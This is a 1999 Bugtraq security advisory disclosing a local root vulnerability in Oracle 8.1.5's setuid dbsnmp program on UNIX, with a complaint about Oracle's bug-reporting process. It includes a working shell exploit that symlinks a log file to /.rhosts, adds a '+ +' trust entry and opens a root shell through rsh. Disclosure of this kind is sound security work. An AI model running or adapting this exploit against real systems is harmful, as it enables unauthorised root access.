[12569] in bugtraq
Oracle 8 root exploit
daemon@ATHENA.MIT.EDU (Tellier, Brock)
Sat Nov 13 21:58:29 1999
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <382DD9B0.D2FE7755@usa.net>
Date: Sat, 13 Nov 1999 13:35:47 -0800
Reply-To: btellier@USA.NET
From: "Tellier, Brock" <btellier@USA.NET>
X-To: bugtraq@securityfocus.com, rfp@wiretrip.net,
vacuum@technotronic.com, jpatel@organic.com, chunt@organic.com
To: BUGTRAQ@SECURITYFOCUS.COM
Greetings,
OVERVIEW
A vulnerability exists in Oracle 8.1.5 for UN*X which may allow any user
to obtain root privileges.
BACKGROUND
My testing was done with Oracle 8.1.5 on Solaris 2.6 SPARC edition.
This shouldn't make any difference, however, and I would consider any
UNIX Oracle implementation to be exploitable.
DETAILS
When run without ORACLE_HOME being set, dbsnmp (suid root/sgid dba by
default) will dump two log files out into pwd, dbsnmpc and dbsnmpt . If
these files do not exist, dbsnmpd will attempt to create them mode 666
and dump around 400 bytes of uncontrolable output into them. If the
files do exist, dbsnmp will append these 400 bytes but not change the
permissions. Thus if root does not have an .rhosts file, we can obtain
root privs by creating a symlink from /tmp/dbsnmpc to /.rhosts. One
thing to note about the exploit is that on my particular implementation,
a normal user does not have read access above /product/ in the Oracle
path (something like /u01/app/oracle/product/8.1.5/bin/dbsnmp). This
won't prevent you from running the exploit since the execute bit is set
for world on all of Oracle's directories, but you may have to guess
about the location of dbsnmp. This can usually done by examining the
process list for Oracle entries.
EDITORIAL
One small rant about Oracle is their ridiculously complicated bug
reporting scheme, which asks you 2814 questions and allows you ONE line
of text to explain your problem. In this day and age, I don't
understand why every major software vendor doesn't have something as
simple as a mailto security@vendor.com SOMEWHERE on their site. In
fact, when I searched Oracle's web page, I got zero hits on the word
"security". Perhaps this address does exist and a bugtraq reader would
care to enlighten me.
EXPLOIT
oracle8% uname -a; id
SunOS oracle8 5.6 Generic_105181-05 sun4u sparc
SUNW,Ultra-5_10
uid=102(btellier) gid=10(staff)
oracle8% /tmp/oracle.sh
couldn't read file "/config/nmiconf.tcl": no such file or directory
Failed to initialize nl component,error=462
Failed to initialize nl component,error=462
#
--- oracle.sh ---
#!/bin/sh
# Exploit for Oracle 8.1.5 on Solaris 2.6 and probably others
# You'll probably have to change your path to dbsnmp
# Exploit will only work if /.rhosts does NOT exist
#
# Brock Tellier btellier@usa.net
cd /tmp
unset ORACLE_HOME
umask 0000
ln -s /.rhosts /tmp/dbsnmpc.log
/u01/app/oracle/product/8.1.5/bin/dbsnmp
echo "+ +" > /.rhosts
rsh -l root localhost 'sh -i'
rsh -l root localhost rm /tmp/*log*
rsh -l root localhost rm /.rhosts
------